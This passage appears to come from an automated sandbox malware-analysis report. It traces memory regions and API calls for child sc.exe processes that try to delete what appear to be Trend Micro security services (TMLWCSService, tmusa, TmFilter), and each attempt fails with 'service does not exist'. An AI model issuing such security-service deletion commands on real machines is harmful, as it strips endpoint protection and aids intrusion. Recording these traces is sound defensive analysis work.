"pagefile_0x000000ace0df0000" filename = "" Region: id = 5621 start_va = 0xace0e00000 end_va = 0xace0e06fff entry_point = 0x0 region_type = private name = "private_0x000000ace0e00000" filename = "" Region: id = 5622 start_va = 0xace0ee0000 end_va = 0xace0f5ffff entry_point = 0x0 region_type = private name = "private_0x000000ace0ee0000" filename = "" Region: id = 5623 start_va = 0xace1070000 end_va = 0xace112dfff entry_point = 0xace1070000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5624 start_va = 0xace1200000 end_va = 0xace120ffff entry_point = 0x0 region_type = private name = "private_0x000000ace1200000" filename = "" Region: id = 5625 start_va = 0x7ff67a000000 end_va = 0x7ff67a0fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a000000" filename = "" Region: id = 5626 start_va = 0x7ff67a12b000 end_va = 0x7ff67a12cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a12b000" filename = "" Region: id = 5627 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5628 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5638 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5639 start_va = 0xace0f60000 end_va = 0xace0f66fff entry_point = 0x0 region_type = private name = "private_0x000000ace0f60000" filename = "" Region: id = 5640 start_va = 0xace1210000 end_va = 0xace12eefff entry_point = 0xace1210000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5641 start_va = 0xace1130000 end_va = 0xace1141fff entry_point = 0xace1130000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 95 os_tid = 0xdf0 [0080.307] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0080.307] __set_app_type (_Type=0x1) [0080.307] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0080.308] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0080.308] SetThreadUILanguage (LangId=0x0) returned 0x409 [0080.343] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0080.343] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0080.343] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0080.343] _wcsicmp (_String1="delete", _String2="query") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="start") returned -15 [0080.343] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0080.343] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0080.343] _wcsicmp (_String1="delete", _String2="control") returned 1 [0080.343] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0080.343] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0080.343] _wcsicmp (_String1="delete", _String2="config") returned 1 [0080.343] _wcsicmp (_String1="delete", _String2="description") returned -7 [0080.343] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0080.343] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0080.343] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0080.343] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0080.343] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0080.343] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0080.343] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0080.343] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0080.343] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0080.343] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0080.343] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0080.343] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0080.345] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xace0f78b90 [0080.349] OpenServiceW (hSCManager=0xace0f78b90, lpServiceName="TmFilter", dwDesiredAccess=0x10000) returned 0x0 [0080.349] GetLastError () returned 0x424 [0080.350] _ultow (in: _Dest=0x424, _Radix=-521470728 | out: _Dest=0x424) returned="1060" [0080.350] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0080.351] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xace0eafcb0, nSize=0x2, Arguments=0xace0eafce0 | out: lpBuffer="鎰¬") returned 0x62 [0080.351] GetFileType (hFile=0x24) returned 0x2 [0080.351] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xace0eafc60 | out: lpMode=0xace0eafc60) returned 1 [0080.371] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xace0f793b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xace0eafc58, lpReserved=0x0 | out: lpBuffer=0xace0f793b0*, lpNumberOfCharsWritten=0xace0eafc58*=0x62) returned 1 [0080.371] LocalFree (hMem=0xace0f793b0) returned 0x0 [0080.371] LocalFree (hMem=0x0) returned 0x0 [0080.371] CloseServiceHandle (hSCObject=0xace0f78b90) returned 1 [0080.371] LocalFree (hMem=0x0) returned 0x0 [0080.372] exit (_Code=1060) Thread: id = 362 os_tid = 0x1378 Process: id = "68" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf092000" os_pid = "0xdf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"TMLWCSService\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1387 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1388 start_va = 0xa5a4ce0000 end_va = 0xa5a4cfffff entry_point = 0x0 region_type = private name = "private_0x000000a5a4ce0000" filename = "" Region: id = 1389 start_va = 0xa5a4d00000 end_va = 0xa5a4d13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5a4d00000" filename = "" Region: id = 1390 start_va = 0xa5a4d20000 end_va = 0xa5a4d9ffff entry_point = 0x0 region_type = private name = "private_0x000000a5a4d20000" filename = "" Region: id = 1391 start_va = 0xa5a4da0000 end_va = 0xa5a4da3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5a4da0000" filename = "" Region: id = 1392 start_va = 0xa5a4db0000 end_va = 0xa5a4db0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5a4db0000" filename = "" Region: id = 1393 start_va = 0xa5a4dc0000 end_va = 0xa5a4dc1fff entry_point = 0x0 region_type = private name = "private_0x000000a5a4dc0000" filename = "" Region: id = 1394 start_va = 0x7df5ff980000 end_va = 0x7ff5ff97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff980000" filename = "" Region: id = 1395 start_va = 0x7ff67ab50000 end_va = 0x7ff67ab72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab50000" filename = "" Region: id = 1396 start_va = 0x7ff67ab79000 end_va = 0x7ff67ab79fff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab79000" filename = "" Region: id = 1397 start_va = 0x7ff67ab7e000 end_va = 0x7ff67ab7ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab7e000" filename = "" Region: id = 1398 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1399 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1729 start_va = 0xa5a4e70000 end_va = 0xa5a4f6ffff entry_point = 0x0 region_type = private name = "private_0x000000a5a4e70000" filename = "" Region: id = 1730 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1731 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5463 start_va = 0xa5a4ce0000 end_va = 0xa5a4ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a5a4ce0000" filename = "" Region: id = 5464 start_va = 0xa5a4cf0000 end_va = 0xa5a4cf6fff entry_point = 0x0 region_type = private name = "private_0x000000a5a4cf0000" filename = "" Region: id = 5465 start_va = 0xa5a4dd0000 end_va = 0xa5a4e4ffff entry_point = 0x0 region_type = private name = "private_0x000000a5a4dd0000" filename = "" Region: id = 5466 start_va = 0xa5a4f70000 end_va = 0xa5a502dfff entry_point = 0xa5a4f70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5467 start_va = 0xa5a50d0000 end_va = 0xa5a50dffff entry_point = 0x0 region_type = private name = "private_0x000000a5a50d0000" filename = "" Region: id = 5468 start_va = 0x7ff67aa50000 end_va = 0x7ff67ab4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aa50000" filename = "" Region: id = 5469 start_va = 0x7ff67ab7c000 end_va = 0x7ff67ab7dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67ab7c000" filename = "" Region: id = 5470 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5471 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5482 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5483 start_va = 0xa5a4e50000 end_va = 0xa5a4e56fff entry_point = 0x0 region_type = private name = "private_0x000000a5a4e50000" filename = "" Region: id = 5484 start_va = 0xa5a50e0000 end_va = 0xa5a51befff entry_point = 0xa5a50e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5485 start_va = 0xa5a5030000 end_va = 0xa5a5041fff entry_point = 0xa5a5030000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 96 os_tid = 0xdf8 [0079.398] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.398] __set_app_type (_Type=0x1) [0079.398] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.398] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.398] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.493] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.493] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.493] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.493] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.493] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.493] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.493] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.493] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.493] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.493] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.493] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.493] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.493] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.493] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.493] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.493] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.493] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.493] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.493] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.493] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.493] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.493] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.493] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.495] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xa5a4e78ac0 [0079.499] OpenServiceW (hSCManager=0xa5a4e78ac0, lpServiceName="TMLWCSService", dwDesiredAccess=0x10000) returned 0x0 [0079.500] GetLastError () returned 0x424 [0079.500] _ultow (in: _Dest=0x424, _Radix=-1529219608 | out: _Dest=0x424) returned="1060" [0079.500] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.501] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xa5a4d9f5a0, nSize=0x2, Arguments=0xa5a4d9f5d0 | out: lpBuffer="顐ꓧ¥") returned 0x62 [0079.501] GetFileType (hFile=0x24) returned 0x2 [0079.502] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xa5a4d9f550 | out: lpMode=0xa5a4d9f550) returned 1 [0079.537] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xa5a4e79850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xa5a4d9f548, lpReserved=0x0 | out: lpBuffer=0xa5a4e79850*, lpNumberOfCharsWritten=0xa5a4d9f548*=0x62) returned 1 [0079.538] LocalFree (hMem=0xa5a4e79850) returned 0x0 [0079.538] LocalFree (hMem=0x0) returned 0x0 [0079.538] CloseServiceHandle (hSCObject=0xa5a4e78ac0) returned 1 [0079.538] LocalFree (hMem=0x0) returned 0x0 [0079.538] exit (_Code=1060) Thread: id = 348 os_tid = 0x1340 Process: id = "69" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xf0d7000" os_pid = "0xdfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"tmusa\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1400 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1401 start_va = 0xfa305b0000 end_va = 0xfa305cffff entry_point = 0x0 region_type = private name = "private_0x000000fa305b0000" filename = "" Region: id = 1402 start_va = 0xfa305d0000 end_va = 0xfa305e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fa305d0000" filename = "" Region: id = 1403 start_va = 0xfa305f0000 end_va = 0xfa3066ffff entry_point = 0x0 region_type = private name = "private_0x000000fa305f0000" filename = "" Region: id = 1404 start_va = 0xfa30670000 end_va = 0xfa30673fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fa30670000" filename = "" Region: id = 1405 start_va = 0xfa30680000 end_va = 0xfa30680fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fa30680000" filename = "" Region: id = 1406 start_va = 0xfa30690000 end_va = 0xfa30691fff entry_point = 0x0 region_type = private name = "private_0x000000fa30690000" filename = "" Region: id = 1407 start_va = 0x7df5ff140000 end_va = 0x7ff5ff13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff140000" filename = "" Region: id = 1408 start_va = 0x7ff67a6f0000 end_va = 0x7ff67a712fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a6f0000" filename = "" Region: id = 1409 start_va = 0x7ff67a71d000 end_va = 0x7ff67a71efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a71d000" filename = "" Region: id = 1410 start_va = 0x7ff67a71f000 end_va = 0x7ff67a71ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a71f000" filename = "" Region: id = 1411 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1412 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1732 start_va = 0xfa306f0000 end_va = 0xfa307effff entry_point = 0x0 region_type = private name = "private_0x000000fa306f0000" filename = "" Region: id = 1733 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1734 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5450 start_va = 0xfa305b0000 end_va = 0xfa305bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000fa305b0000" filename = "" Region: id = 5451 start_va = 0xfa305c0000 end_va = 0xfa305c6fff entry_point = 0x0 region_type = private name = "private_0x000000fa305c0000" filename = "" Region: id = 5452 start_va = 0xfa307f0000 end_va = 0xfa308adfff entry_point = 0xfa307f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5453 start_va = 0xfa308b0000 end_va = 0xfa3092ffff entry_point = 0x0 region_type = private name = "private_0x000000fa308b0000" filename = "" Region: id = 5454 start_va = 0xfa30a90000 end_va = 0xfa30a9ffff entry_point = 0x0 region_type = private name = "private_0x000000fa30a90000" filename = "" Region: id = 5455 start_va = 0x7ff67a5f0000 end_va = 0x7ff67a6effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a5f0000" filename = "" Region: id = 5456 start_va = 0x7ff67a71b000 end_va = 0x7ff67a71cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a71b000" filename = "" Region: id = 5457 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5458 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5459 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5460 start_va = 0xfa306a0000 end_va = 0xfa306a6fff entry_point = 0x0 region_type = private name = "private_0x000000fa306a0000" filename = "" Region: id = 5461 start_va = 0xfa30930000 end_va = 0xfa30a0efff entry_point = 0xfa30930000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5462 start_va = 0xfa306b0000 end_va = 0xfa306c1fff entry_point = 0xfa306b0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 97 os_tid = 0xe00 [0079.304] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0079.304] __set_app_type (_Type=0x1) [0079.304] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0079.305] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0079.305] SetThreadUILanguage (LangId=0x0) returned 0x409 [0079.374] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0079.374] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0079.374] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0079.375] _wcsicmp (_String1="delete", _String2="query") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="start") returned -15 [0079.375] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0079.375] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0079.375] _wcsicmp (_String1="delete", _String2="control") returned 1 [0079.375] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0079.375] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0079.375] _wcsicmp (_String1="delete", _String2="config") returned 1 [0079.375] _wcsicmp (_String1="delete", _String2="description") returned -7 [0079.375] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0079.375] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0079.375] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0079.375] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0079.375] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0079.375] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0079.375] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0079.375] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0079.375] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0079.375] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0079.375] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0079.375] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0079.377] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xfa306f8c80 [0079.383] OpenServiceW (hSCManager=0xfa306f8c80, lpServiceName="tmusa", dwDesiredAccess=0x10000) returned 0x0 [0079.383] GetLastError () returned 0x424 [0079.383] _ultow (in: _Dest=0x424, _Radix=812054376 | out: _Dest=0x424) returned="1060" [0079.383] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0079.385] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xfa3066f720, nSize=0x2, Arguments=0xfa3066f750 | out: lpBuffer="鎰はú") returned 0x62 [0079.385] GetFileType (hFile=0x24) returned 0x2 [0079.385] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xfa3066f6d0 | out: lpMode=0xfa3066f6d0) returned 1 [0079.399] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xfa306f93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xfa3066f6c8, lpReserved=0x0 | out: lpBuffer=0xfa306f93b0*, lpNumberOfCharsWritten=0xfa3066f6c8*=0x62) returned 1 [0079.400] LocalFree (hMem=0xfa306f93b0) returned 0x0 [0079.400] LocalFree (hMem=0x0) returned 0x0 